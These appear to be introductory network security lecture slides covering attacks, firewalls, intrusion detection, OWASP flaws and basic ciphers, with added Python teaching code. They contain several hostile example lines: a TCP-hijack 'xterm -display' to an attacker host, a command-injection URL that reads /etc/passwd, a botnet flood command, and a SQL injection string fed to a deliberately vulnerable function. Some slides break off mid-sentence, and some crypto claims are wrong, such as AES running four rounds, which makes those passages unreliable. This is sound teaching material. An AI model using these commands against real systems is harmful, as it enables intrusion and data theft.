NETWORK SECURITY
Network Security
Day 1
The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to
receive him;
not on the chance of his not attacking, but rather on the fact that we have made our position unassailable.
A Few Terms
• potential for undesirable outcomes
THREAT
• mechanism by which loss can happen
VULNERABILITY
• deliberate assault on system
Security: Goals
To achieve particular (security) properties
in the presence of particular kinds and levels of threat.
• What properties?
Security
The protection afforded to an automated information system in order to attain the applicable objectives of preserving the integrity,
availability and confidentiality of information system resources (includes hardware, software, firmware, information/data, and
telecommunications)
Aspects of Security
Consider the 3 aspects of information security:
◦ Security attack
◦ Security mechanism (control)
Security Requirements
Confidentiality, Integrity, Availability, Authenticity, Non-repudiation, Authorization
Security Requirements
Confidentiality:
Only authorized parties have read access to information
Integrity:
Security Requirements
Availability:
Authorized access to information when needed
Authenticity:
Security Requirements
Non-repudiation:
Message exchange can be proved by sender and receiver
Authorization:
Security Requirements
Freshness:
Passive Attacks
Release of message content (eavesdropping)
◦ Prevented by encryption
Traffic Analysis
◦ Fixed by traffic padding
Active Attacks
Involve
modification
of the data stream, or
creation
of a
false data stream
Active Attacks (cont.)
Masquerade
Replay
Modification of messages
Denial of service
Attack Frameworks
Attacks
◦ Physical Access Attacks: Wiretapping, Server Hacking, Vandalism (Damage)
◦ Dialog Attacks: Eavesdropping, Impersonation, Message Alteration
◦ Penetration Attacks (Access): Scanning (Probing), Break-in, Denial of Service (Rejection), Malware (Viruses, Worms)
◦ Social Engineering: Opening Attachments, Password Theft, Information Theft
Eavesdropping
Compromise the service: Confidentiality
[Figure: dialog between Client PC (Bob) and Server (Alice); the attacker (Eve) intercepts and reads the message “Hello”.]
Encryption
[Figure: Client PC (Bob) and Server (Alice) exchange the encrypted message “100100110001”.]
15-441 Networks Fall 2002 21
Packet Sniffing
Recall how Ethernet works …
When someone wants to send a packet to someone else …
They put the bits on the wire with the destination MAC address …
And remember that other hosts are listening on the wire to detect collisions …
It couldn’t get any easier to figure out what data is being transmitted over the network!
Packet Sniffing
This works for wireless too!
Packet Sniffing
What kinds of data can we get?
Asked another way, what kind of information would be most useful to a malicious user?
Answer: Anything in plain text
◦ Passwords are the most popular
Packet Sniffing
How can we protect ourselves?
Encryption!
SSH, not Telnet
Packet Sniffing
HTTP over SSL
◦ Especially when making purchases with credit cards!
SFTP, not FTP
◦ Unless you really don’t care about the password or data
◦ Can also use KerbFTP
IPSec
Item of Special Interest: Keyloggers
What’s a Keylogger and how does it exploit a Web Application?
◦ Downloaded unknowingly
◦ Resident on Personal Computers
◦ Captures User Activity
Keylogger Mitigations
◦ Train users
◦ Implement effective Anti-Spyware, Anti-Virus
◦ Keep patches and versions current
◦ Firewall
◦ Automatic form filler programs
◦ Cut and paste
◦ One-time passwords
◦ Smartcards
◦ Virtual keyboards
Virtual Keyboard
Some of the features of Federal Student Aid’s Virtual Keyboard include:
◦ Highly effective in evading true “Key Logging”
◦ Widely used by many financial institutions
◦ Low cost technology to deploy (even for 50 million users)
◦ Does not require any new hardware or software on client machines
◦ Can work in conjunction with the existing keyboard
◦ Keys can be entered by mouse click or by leaving mouse on the key for 2 seconds
Item of Special Interest: WSNPOEM
WSNPOEM
◦ Variant of the Banker/InfoStealer/Bancos/Zbot family
◦ PWS-Banker.gen.bw by McAfee, Infostealer.Banker.C by Symantec, Trojan-Spy.Win32.Bancos.aam by Kaspersky, Mal/Zbot-A by Sophos ...
◦ How does it exploit a Web Application?
◦ WinInet interception
◦ In-process key-logging
Item of Special Interest WSNPOEM
How do we know about it:
◦ Since 2004 we have been receiving periodic files from US-CERT
◦ Now provided weekly
◦ Government wide concern
Impact:
◦ > 22,000 unique compromised SSNs
Item of Special Interest: WSNPOEM
Malware            Occurrences
wsnpoem_v2         296475
wsnpoem_v3         394
wsnpoem_v6         15643
wsnpoem_v4         3447
wsnpoem            5019
haxdoor            4888
nethelper          4025
win32agent         3412
fireming           3063
silentbanker_v2    1583
passsickle         264
manda              259
nowhere            217
win32agent_v4      39
urlzone            6
The wsnpoem malware & variants make up 95% of the incidents captured in the US-CERT files
Item of Special Interest: WSNPOEM
What can be done at the application side?
◦ Require two factor authentication
◦ Virtual Keyboards, URL encoding, header encryption, shared keys, security questions, and images are all vulnerable to this type of attack
◦ Training and awareness for client side prevention
◦ Train those that are accessible
◦ Broadcast messages or post warnings on websites
What can be done at the client side?
Modification
Compromise the service: Integrity
[Figure: dialog between Client PC (Bob) and Server (Alice); the message “Balance = $1” is altered in transit to “Balance = $1,000,000”.]
Fabrication
Compromise the service: Authenticity
[Figure: the attacker claims “I’m Bob” and is challenged: “Prove it! (Authenticate Yourself)”.]
Modification & Fabrication Defense
Secure Dialog
[Figure: Client PC (Bob) and Server (Alice); the attacker cannot read messages, alter messages, or impersonate.]
Automatically handles:
◦ Negotiation of security options
◦ Authentication
◦ Encryption
◦ Integrity
TCP Attacks
Recall how IP works…
◦ End hosts create IP packets and routers process them purely based on destination address alone
Problem: End hosts may lie about other fields which do not affect delivery
◦ Source address – host may trick destination into believing that the packet is from a trusted source
◦ Especially applications which use IP addresses as a simple authentication method
◦ Solution – use better authentication methods
TCP Attacks
TCP connections have associated state
◦ Starting sequence numbers, port numbers
Problem – what if an attacker learns these values?
◦ Port numbers are sometimes well known to begin with (ex. HTTP port 80)
◦ Sequence numbers are sometimes chosen in very predictable ways
TCP Attacks
If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!
Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source
◦ Ex. Instead of downloading and running new program, you download a virus and execute it
TCP Attacks
Mr. Big Ears lies on the path between Alice and Bob on the network
◦ He can intercept all of their packets
TCP Attacks
First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?)
TCP Attacks
Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network)
TCP Attacks
What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?
◦ Can just DoS Alice instead of dropping her packets
◦ Can just send guesses of what the ISN is until it is accepted
How do you know when the ISN is accepted?
◦ Mitnick: payload is “add self to .rhosts”
◦ Or, “xterm -display MrBigEars:0”
TCP Attacks
Why are these types of TCP attacks so dangerous?
Web server
Malicious user
TCP Attacks
How do we prevent this?
IPSec
◦ Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
◦ Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without
Service Disruption and Interruption
Compromise the service
Availability
Message Flood
Server Overloaded By Message Flood
Non-repudiation
When sending/receiving messages,
both parties involved get evidence of the communication.
Later on, neither of them can successfully deny that the
Evidence is often in the form of signed messages, which provides guarantees concerning their originator.
Might also provide mechanisms to guarantee fairness.
No party should – at any step – have the evidence that they require
The main objective of a non-repudiation protocol is thus that of creating the evidence for the parties involved.
1. Correctness will be concerned with the suitability of the evidence.
2. Analysis will need to take into consideration the fact that each party might have acted not in compliance with the protocol.
Anonymity
Seems like an unusual property for security protocols to ensure …
Mostly required by malicious actions?
Nope!
Who else needs well-formed secured communication protocols?
Whistle-blowers, anti-Government protesters
Anonymity
Its main objective is that of protecting the identity of
agents with respect to particular events or messages.
◦ The messages need not be protected.
◦ The model separates:
1. the identity of the agents who sent a message
Common security attacks and their countermeasures
Finding a way into the network
◦ Firewalls
Exploiting software bugs, buffer overflows
◦ Intrusion Detection Systems
Denial of Service
Common security attacks and their countermeasures
TCP hijacking
◦ IPSec
Packet sniffing
◦ Encryption (SSH, SSL, HTTPS)
Social problems
◦ Education
Minor Detour…
Say we got the /etc/passwd file from the IRIX server
What can we do with it?
Dictionary Attack
We can run a dictionary attack on the passwords
◦ The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash)
◦ Can take a dictionary of words, crypt() them all, and compare with the hashed passwords
This is why your passwords should be meaningless random junk!
◦ For example, “sdfo839f” is a good password
◦ That is not my andrew password
Denial of Service
Purpose: Make a network service unusable, usually by overloading the server or network
Many different kinds of DoS attacks
◦ SYN flooding
◦ SMURF
◦ Distributed attacks
Denial of Service
SYN flooding attack
Send SYN packets with bogus source address
◦ Why?
Server responds with SYN ACK and keeps state about TCP half-open connection
◦ Eventually, server memory is exhausted with this state
Solution: use “SYN cookies”
◦ In response to a SYN, create a special “cookie” for the connection, and forget everything else
◦ Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
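The SYN cookie idea above, as an added example (not code from the original slides or from any real TCP stack): the server encodes what it needs into the sequence number of its SYN ACK and stores nothing until a valid ACK returns. The 6/2/24-bit cookie layout, the HMAC-SHA-256 construction, the MSS table, the 64-second tick and all addresses are assumptions chosen for illustration.

```python
import hashlib
import hmac

SECRET = b"constructed-demo-secret"   # assumption: a random per-boot secret in practice
MSS_TABLE = [536, 1300, 1440, 1460]   # assumption: 2-bit index into common MSS values
MASK32 = 0xFFFFFFFF


def _mac24(src, sport, dst, dport, client_isn, counter, mss_idx):
    """24-bit keyed hash that binds a cookie to one connection attempt."""
    msg = f"{src}|{sport}|{dst}|{dport}|{client_isn}|{counter}|{mss_idx}".encode()
    return hmac.new(SECRET, msg, hashlib.sha256).digest()[:3]


def make_cookie(src, sport, dst, dport, client_isn, client_mss, now):
    """Sequence number for the SYN ACK. Nothing about the SYN is stored."""
    counter = (int(now) // 64) % 64    # 6 bits, ticks every 64 seconds
    # Largest table entry not exceeding the client's MSS (index 0 if none fits).
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= client_mss), default=0)
    mac = _mac24(src, sport, dst, dport, client_isn, counter, mss_idx)
    return (counter << 26) | (mss_idx << 24) | int.from_bytes(mac, "big")


def check_ack(src, sport, dst, dport, seq, ack, now):
    """Validate the final ACK. Return the recovered MSS, or None to drop it."""
    cookie = (ack - 1) & MASK32        # the client acknowledges cookie + 1
    client_isn = (seq - 1) & MASK32    # the client's SYN used one sequence number
    counter = cookie >> 26
    mss_idx = (cookie >> 24) & 0x3
    age = ((int(now) // 64) - counter) % 64
    if age > 1:                        # cookie is older than about two minutes
        return None
    expected = _mac24(src, sport, dst, dport, client_isn, counter, mss_idx)
    presented = (cookie & 0xFFFFFF).to_bytes(3, "big")
    if not hmac.compare_digest(expected, presented):
        return None                    # forged, altered, or for another connection
    return MSS_TABLE[mss_idx]          # "forgotten" state recreated from the cookie


def demo():
    """Constructed handshake: one legitimate ACK and three that must be dropped."""
    conn = ("198.51.100.7", 40000, "192.0.2.1", 80)
    t0 = 1_000_000
    cookie = make_cookie(*conn, client_isn=12345, client_mss=1460, now=t0)
    ack = (cookie + 1) & MASK32
    return {
        "legitimate": check_ack(*conn, seq=12346, ack=ack, now=t0 + 30),
        "expired": check_ack(*conn, seq=12346, ack=ack, now=t0 + 200),
        "altered": check_ack(*conn, seq=12346, ack=((cookie ^ 1) + 1) & MASK32, now=t0 + 30),
        "other_source": check_ack("203.0.113.9", 40000, "192.0.2.1", 80,
                                  seq=12346, ack=ack, now=t0 + 30),
    }


if __name__ == "__main__":
    print(demo())
```

A SYN with a bogus source address never produces the matching ACK, so it costs the server one hash computation and no memory.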
Denial of Service
SMURF
◦ Source IP address of a broadcast ping is forged
Denial of Service
[Figure: the perpetrator sends an ICMP echo, with the spoofed source address of the victim, across the Internet to an IP broadcast address.]
Denial of Service
Distributed Denial of Service
◦ Same techniques as regular DoS, but on a much larger scale
◦ Example: Sub7Server Trojan and IRC bots
◦ Infect a large number of machines with a “zombie” program
◦ Zombie program logs into an IRC channel and awaits commands
◦ Example:
◦ Bot command: !p4 207.71.92.193
◦ Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
◦ Sends 10,000 64k packets to the host (655MB!)
Denial of Service
Mini Case Study – CodeRed
◦ July 19, 2001: over 359,000 computers infected in less than 14 hours
◦ Used a recently known buffer exploit in Microsoft IIS
Denial of Service
Why is this under the Denial of Service category?
◦ CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month!
Denial of Service: Counter Measures
◦ Ingress filtering (RFC 2267)
◦ If a packet p comes in on an interface I, and no known route to the source of p passes through I, drop p
◦ Stay on top of CERT advisories and security patches
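The ingress filtering rule above, as an added example (not code from the original slides or from any router): the first check is the slide's rule, and the second is a stricter variant, added here as an assumption, that only honours the longest-prefix route. The routing table, interface names and packets are constructed.

```python
import ipaddress

# Constructed routing table: (destination prefix, outgoing interface).
ROUTES = [
    (ipaddress.ip_network("203.0.113.0/24"), "cust0"),
    (ipaddress.ip_network("198.51.100.0/24"), "cust1"),
    (ipaddress.ip_network("0.0.0.0/0"), "upstream"),
]


def routes_to(src, routes=ROUTES):
    """All known routes that would carry traffic back to this source address."""
    addr = ipaddress.ip_address(src)
    return [(net, ifc) for net, ifc in routes if addr in net]


def accept_any_route(src, iface, routes=ROUTES):
    """The slide's rule: keep p if some known route to its source passes through I."""
    return any(ifc == iface for _, ifc in routes_to(src, routes))


def accept_best_route(src, iface, routes=ROUTES):
    """Stricter variant (assumption): only the longest-prefix route to the source counts."""
    matches = routes_to(src, routes)
    if not matches:
        return False
    best_net, best_ifc = max(matches, key=lambda r: r[0].prefixlen)
    return best_ifc == iface


# Constructed packets: (claimed source address, interface it arrived on).
PACKETS = [
    ("203.0.113.10", "cust0"),     # customer using its own prefix
    ("192.0.2.99", "cust0"),       # customer claiming an address it does not own
    ("198.51.100.5", "cust0"),     # customer claiming the other customer's prefix
    ("203.0.113.10", "upstream"),  # customer prefix showing up from the Internet side
    ("192.0.2.99", "upstream"),    # ordinary Internet traffic
]


def classify(packets=PACKETS):
    """Return (source, interface, any-route verdict, best-route verdict) per packet."""
    return [(s, i, accept_any_route(s, i), accept_best_route(s, i)) for s, i in packets]


if __name__ == "__main__":
    for src, iface, loose, strict in classify():
        print(f"{src:15} on {iface:8} any-route={'pass' if loose else 'drop'} "
              f"best-route={'pass' if strict else 'drop'}")
```

The two checks differ only on the fourth packet: the default route makes any source "reachable" through the upstream interface, so the slide's rule is most effective on customer-facing interfaces that carry no default route.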
Summary
Security Attacks
Interruption: This is an attack on availability
Interception: This is an attack on confidentiality
Modification: This is an attack on integrity
Fabrication: This is an attack on authenticity
Alert Ahead of Time!
Firewalls
Basic problem – many network applications and protocols have security problems that are fixed over time
◦ Difficult for users to keep up with changes and keep host secure
◦ Solution
◦ Administrators limit access to end hosts by using a firewall
◦ Firewall is kept up-to-date by administrators
Firewalls
Like a castle with a drawbridge
◦ Only one point of access into the network
◦ This can be good or bad
◦ Easier to DOS
Can be hardware or software
◦ Ex. Some routers come with firewall functionality
◦ ipfw, ipchains, pf on Unix systems, Windows from XP onwards, and Mac OS X have built in firewalls
Firewalls
DMZ
[Figure: Internet, firewall, firewall; the DMZ holds the web server, email server, web proxy, etc.]
Firewalls
Used to filter packets based on a combination of features
◦ Simple, network-layer packet filtering firewalls
◦ man ipfw
e.g. Drop packets with destination port of 23 (Telnet)
Just turn Telnet off?
◦ On all devices …
Firewalls
Here is what a computer with a default Windows XP install looks like:
◦ 135/tcp open loc-srv
◦ 139/tcp open netbios-ssn
◦ 445/tcp open microsoft-ds
◦ 1025/tcp open NFS-or-IIS
◦ 3389/tcp open ms-term-serv
◦ 5000/tcp open UPnP
Might need some of these services, or might not be able to control all the machines on the network
Firewalls
What does a firewall rule look like?
◦ Depends on the firewall used
Example: ipfw
◦ /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet
Other examples: WinXP & Mac OS X have built in and third party firewalls
◦ Different graphical user interfaces
Network Penetration (Access) Attacks and Firewalls
[Figure: the attacker sends attack packets across the Internet; the Internet firewall drops some packets and passes others, and a passed packet reaches a hardened client PC.]
Scanning (Probing) Attacks
[Figure: the attacker on the Internet sends probe packets to 172.16.99.1, 172.16.99.2, etc. on the corporate network. Host 172.16.99.1 replies; there is no host at 172.16.99.2 and no reply. Results: 172.16.99.1 is reachable, 172.16.99.2 is not reachable, …]
Intrusion Detection
Used to monitor for “suspicious activity” on a network
◦ Can protect against known software exploits, like buffer overflows
Open Source IDS: Snort, www.snort.org
Intrusion Detection
Uses “intrusion signatures”
◦ Well known patterns of behavior
◦ Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.
Example
◦ IRIX vulnerability in webdist.cgi
◦ Can make a rule to drop packets containing the line
◦ “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”
However, IDS is only useful if contingency plans are in place to curb attacks as they are occurring
Definition
• Vulnerability: a weakness in a system which allows an attacker to violate the integrity of that system.
– weak passwords
– software bugs
– a computer virus or other malware
– script code injection
Common Vulnerabilities and Exposures
http://cve.mitre.org/
◦ CVE is a list or dictionary that provides common names (and CVE numbers) for publicly known information security vulnerabilities
◦ e.g. CVE-2008-0075:
Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 through 6.0 allows remote attackers to execute arbitrary code via crafted inputs to ASP pages.
Exploit
An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a vulnerability in order to cause unintended or unanticipated behavior to occur on computer software & hardware.
Commonly categorized and named by the type of vulnerability they utilize, e.g.
◦ SQL Injection Vulnerability → SQL Inj. Exploit
◦ Buffer Overflows Vulnerability → B.O. Exploit
OWASP Top 10 Security Vulnerabilities
1 - Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
2 - Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
3 - Malicious File Execution Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
OWASP Top 10 Security Vulnerabilities
4 - Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
5 - Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
6 - Information Leakage and Improper Error Handling Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data, or conduct more serious attacks.
OWASP Top 10 Security Vulnerabilities
7 - Broken Authentication and Session Management Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.
8 - Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes, such as credit card fraud.
9 - Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications.
10 - Failure to Restrict URL Access Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access
OWASP Top 1: Cross Site Scripting
◦ What is Cross Site Scripting?
◦ In its simplest form, it’s a process that can occur anywhere a web application uses input from a malicious user to generate output without validating or encoding the input.
◦ During a Cross Site Scripting attack, a malicious source sends a script that is executed by the end user’s browser. It allows attackers to embed code from one webpage into another webpage by changing its HTML code.
◦ It’s been used to deface web sites, conduct phishing attacks, or it can take over a user’s browser and force them to execute commands they’re unaware of.
◦ Cross Site Scripting attacks usually come in the form of JavaScript; however, any active content poses a potential danger.
◦ Prevention
◦ Validate the user’s input against what is expected
◦ Encode user supplied output
◦ After you believe you’ve done the right things during code development, inspect your code with a scan.
OWASP Top 2: Injection Flaws (SQL Injection)
◦ What is SQL Injection
◦ SQL injection is the actual injection of SQL commands into web applications through user input fields.
◦ When an application uses internal SQL commands and you also have user input capabilities (like a login screen), SQL commands can be injected that can create, read, update, or delete any data available to the application.
◦ Prevention
◦ You can put tight constraints on user inputs. But the best method of preventing SQL injection is to avoid the use of dynamically generated SQL in your code. Instead use stored or canned
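The two prevention measures above side by side, as an added example (not code from the original slides): a lookup built from dynamically generated SQL, the same lookup with a bound parameter, and an allow-list constraint on the input. The table, user names, function names and the allowed-character pattern are constructed for illustration; a parameterized query is used here as one way to avoid dynamic SQL.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory database with three users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "admin"), ("bob", "student"), ("o'brien", "student")])
    return db


def find_user_dynamic(db, name):
    """Deliberately vulnerable: the input becomes part of the SQL text itself."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return sorted(row[0] for row in db.execute(sql))


def find_user_parameterized(db, name):
    """Hardened: the statement is fixed and the input travels only as data."""
    rows = db.execute("SELECT name FROM users WHERE name = ?", (name,))
    return sorted(row[0] for row in rows)


# Tight input constraint (assumption: names are 1-32 of these characters).
NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_name(name):
    return NAME_RE.fullmatch(name) is not None


def dynamic_query_breaks(db, name):
    """True if the dynamically built statement fails to parse for this input."""
    try:
        find_user_dynamic(db, name)
    except sqlite3.OperationalError:
        return True
    return False


def demo():
    db = make_db()
    hostile = "x' OR '1'='1"            # textbook injection string
    return {
        "dynamic_hostile": find_user_dynamic(db, hostile),
        "param_hostile": find_user_parameterized(db, hostile),
        "valid_hostile": is_valid_name(hostile),
        # A legitimate name with an apostrophe: dynamic SQL cannot even run it,
        # the allow-list rejects it, and the bound parameter handles it.
        "dynamic_breaks_obrien": dynamic_query_breaks(db, "o'brien"),
        "valid_obrien": is_valid_name("o'brien"),
        "param_obrien": find_user_parameterized(db, "o'brien"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The input constraint alone turns away a real user, while the bound parameter needs no knowledge of which characters are dangerous.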
OWASP Top 3: Malicious File Execution
◦ What is Malicious File Execution
◦ When developers program applications to use input files provided by the user and the bad guy is the one entering the file, a malicious file is executed unknowingly; thus we have malicious file execution.
◦ Malicious file execution attacks can occur anytime the application accepts filenames or files from users.
◦ When these files are executed, they can be used to do just about anything from stealing data to taking over the entire system.
◦ Prevention
◦ Strongly validate user input using "accept known good" as a strategy, or isolate incoming files and check their legitimacy before executing them.
◦ Disable certain PHP commands: I suggest that you visit the OWASP website to see what commands to disable.
OWASP Vulnerabilities: A Common Thread
Common theme: Applications with Dynamic code or user inputs have the most vulnerabilities!
But required for current, rich applications
Building applications of that nature?
SANS Top 20 Security Vulnerabilities
National Vulnerability Database
In the near future, information warfare will control the form and
future of war... Our sights must not be fixed on the fire-power of the industrial age; rather, they must be trained on the information
warfare of the information age.
Other Vulnerabilities
Code Mistakes
Untrained Users
Insecure Configuration Settings
Code Mistakes
◦ Federal Student Aid has had Code Mistakes
◦ Implement Prevention in Code
◦ Thoroughly Test
◦ Use Tools
Untrained Users
◦ Security ignorance compromises data
◦ Provide the training
◦ Rules of Behavior
◦ Annual refresher training
Insecure Configuration Settings
◦ NIST, DISA, CIS vs. Business Needs
◦ Builds
◦ System Upgrades
◦ Vulnerability Scans
Item of Special Interest: FSA Actions
Revoke User Access
Notify User / School
Review Logs
Assist User / School Clean Computer
How Much Security is Enough?
Estimate: Cost vs. Risk
◦ Risk = Threat * Vulnerability
Social Problems
People can be just as dangerous as unprotected computer systems
◦ People can be lied to, manipulated, bribed, threatened, harmed, tortured, etc. to give up valuable information
◦ Most humans will break down once they are at the “harmed” stage, unless they have been specially trained
Social Problems
Fun Example 1:
◦ “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a bunch of buttons for me”
Social Problems
Fun Example 2:
◦ Someone calls you in the middle of the night
◦ “Have you been calling Egypt for the last six hours?”
◦ “No”
◦ “Well, we have a call that’s actually active right now, it’s on your calling card and it’s to Egypt and as a matter of fact, you’ve got about $2000 worth of charges on your card and … read off your AT&T card number and PIN and then I’ll get rid of the charge for you”
Social Problems
Fun Example 3:
◦ Who saw Office Space?
◦ In the movie, the three disgruntled employees installed a money-stealing worm onto the company’s systems
◦ from inside the company, where they had full access to the company’s systems
Social Problems
There aren’t always solutions to all of these problems
◦ Humans will continue to be tricked into giving out information they shouldn’t
◦ Educating them may help a little here, but, depending on how bad you want the information, there are a lot of bad things you can do to get it
So, the best that can be done is to implement a wide variety of solutions and more closely monitor who has access to what network resources and information
The Security Bias
The balance between the threat to a system and the security services deployed is very asymmetric:
You need to defend each and every aspect to be successful
Summary
The Internet works only because we implicitly trust one another
It is very easy to exploit this trust
The same holds true for software
It is important to stay on top of the latest CERT security advisories to know how to patch any security holes
Conclusions
The what
The scientific mix of mathematical theory and
computational application which allows the confidential
transfer of information.
Kerckhoffs’s Principle
The philosophy of modern cryptanalysis is embodied in the following principle formulated in 1883 by Jean Guillaume Hubert Victor Francois Alexandre Auguste Kerckhoffs von Nieuwenhof (1835 - 1903).
The security of a cryptosystem must not depend on keeping secret the encryption algorithm. The security should depend only on keeping secret the key.
Paradoxes of modern cryptography
Positive results of modern cryptography are based on negative results of complexity theory.
Computers that were designed originally for decryption seem to be now more useful for encryption.
Cryptosystems - ciphers
Cryptography deals with the problem of sending a message (plaintext, cleartext) through an insecure channel, which may be tapped by an adversary (eavesdropper, cryptanalyst), to a legal receiver.
Components of cryptosystems
Plaintext-space: P – a set of plaintexts over an alphabet
Cryptotext-space: C – a set of cryptotexts (ciphertexts) over an alphabet
Key-space: K – a set of keys
Each key $k$ determines an encryption algorithm $e_k$ and a decryption algorithm $d_k$ such that, for any plaintext $w$, $e_k(w)$ is the corresponding cryptotext and:
$$w \in d_k(e_k(w)) \quad \text{or} \quad w = d_k(e_k(w)).$$
As encryption algorithms we can use also randomized algorithms.
Requirements for good cryptosystems
1. Given $e_k$ and a plaintext $w$, it should be easy to compute $c = e_k(w)$.
2. Given $d_k$ and a cryptotext $c$, it should be easy to compute $w = d_k(c)$.
3. A cryptotext $e_k(w)$ should not be much longer than the plaintext $w$.
4. It should be unfeasible to determine $w$ from $e_k(w)$ without knowing $d_k$.
5. The so called avalanche effect should hold: A small change in the plaintext, or in the key, should lead to a big change in the cryptotext (i.e. a change of one bit of the plaintext should result in a change of all bits of the cryptotext, each with the probability close to 0.5).
6. The cryptosystem should not be closed under composition, i.e. not for every two keys $k_1, k_2$ there is a key $k$ such that
Substitution Ciphers
A cipher that substitutes one character with another.
These can be as simple as swapping a list, or can be based on more complex rules.
Caesar ciphers
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
D E F G H I J K L M N O P Q R S T U V W X Y Z A B C
Substitute the letters in the second row for the letters in the top row to encrypt a message
Encrypt(COMPUTER) gives FRPSXWHU
Substitute the letters in the first row for the letters in the second row to decrypt a message
Transposition Cipher
T O D A Y
+ I S + M
O N D A Y
Write the letters in rows of five, using '+' as a blank. Encrypt by spiraling inward from the top left, moving counterclockwise
Encrypt(TODAY IS MONDAY) gives T+ONDAYMYADOIS+
Decrypt by recreating the grid and reading the letters across the row
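The spiral transposition above, as an added example (not code from the original slides); it generalizes the slide's 3-by-5 grid to any row width and pads the last row with '+'. The function names are chosen here for illustration.

```python
def spiral_ccw(rows, cols):
    """Grid coordinates in the slide's reading order: start at the top left,
    go down the left column, right along the bottom row, up the right column,
    left along the top row, then repeat on the inner grid."""
    top, bottom, left, right = 0, rows - 1, 0, cols - 1
    order = []
    while top <= bottom and left <= right:
        for r in range(top, bottom + 1):            # down the left column
            order.append((r, left))
        left += 1
        for c in range(left, right + 1):            # right along the bottom row
            order.append((bottom, c))
        bottom -= 1
        if left <= right:
            for r in range(bottom, top - 1, -1):    # up the right column
                order.append((r, right))
            right -= 1
        if top <= bottom:
            for c in range(right, left - 1, -1):    # left along the top row
                order.append((top, c))
            top += 1
    return order


def encrypt(message, cols=5):
    """Write the message row by row ('+' for blanks), read it out along the spiral."""
    text = message.replace(" ", "+")
    text += "+" * (-len(text) % cols)               # pad the last row
    rows = len(text) // cols
    return "".join(text[r * cols + c] for r, c in spiral_ccw(rows, cols))


def decrypt(cryptotext, cols=5):
    """Put each letter back at its spiral position, then read across the rows."""
    if len(cryptotext) % cols:
        raise ValueError("cryptotext length must be a multiple of the row width")
    rows = len(cryptotext) // cols
    grid = [[""] * cols for _ in range(rows)]
    for ch, (r, c) in zip(cryptotext, spiral_ccw(rows, cols)):
        grid[r][c] = ch
    plain = "".join("".join(row) for row in grid)
    # '+' stood for a blank; trailing blanks were padding.
    return plain.replace("+", " ").rstrip()


if __name__ == "__main__":
    c = encrypt("TODAY IS MONDAY")
    print(c)             # the slide's cryptotext
    print(decrypt(c))
```

The only secret is the row width, so trying every width recovers the message; the letters themselves are never changed, only moved.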
Encryption on computers
Roughly speaking, there are two different broad types of encryption that are used on computers today
◦ Symmetric encryption relies on keeping keys totally secret
◦ Asymmetric encryption actually publicizes one key, but keeps some information private also
Neither is really “better” - they just use different principles. In reality, both are vulnerable to attacks.
Symmetric, or private key cryptography
Most common type is called a block cipher
◦ Processes the plaintext in fixed-size blocks
Examples include DES, 3DES, and AES
All require a secret key which is known by both parties in the communication
Main issue here: need to securely swap the key. How can we do this?
DES: Data Encryption Standard
Adopted 1977, National Bureau of Standards (now NIST)
• Divide message into blocks of 64 bits
• Take a key of 56 bits
DES
In July 1998, DES was officially cracked by a machine built by the EFF
◦ Total cost: under $250,000
◦ Total time: 6-8 months
They then published the details of their approach, which essentially was a brute force attack
Note: 56 bits means 2^56 keys to try
Also, not as easy as just trying. What do you always do to files before sending them somewhere?
3DES
Effort to salvage DES.
Just repeat DES 3 times with different keys!
◦ Effectively DES, with key size 168 bits.
Still secure - brute force attacks take too long
◦ and that is the only way to attack this algorithm
Advanced Encryption Standard (AES)
Designed in response to a call by NIST in 1998
Officially adopted in 2001
Block length is 128 bits, and keys can be 128, 192, or 256 bits.
Essentially, proceeds in 4 rounds (which are repeated):
◦ Substitute bytes
◦ Permute
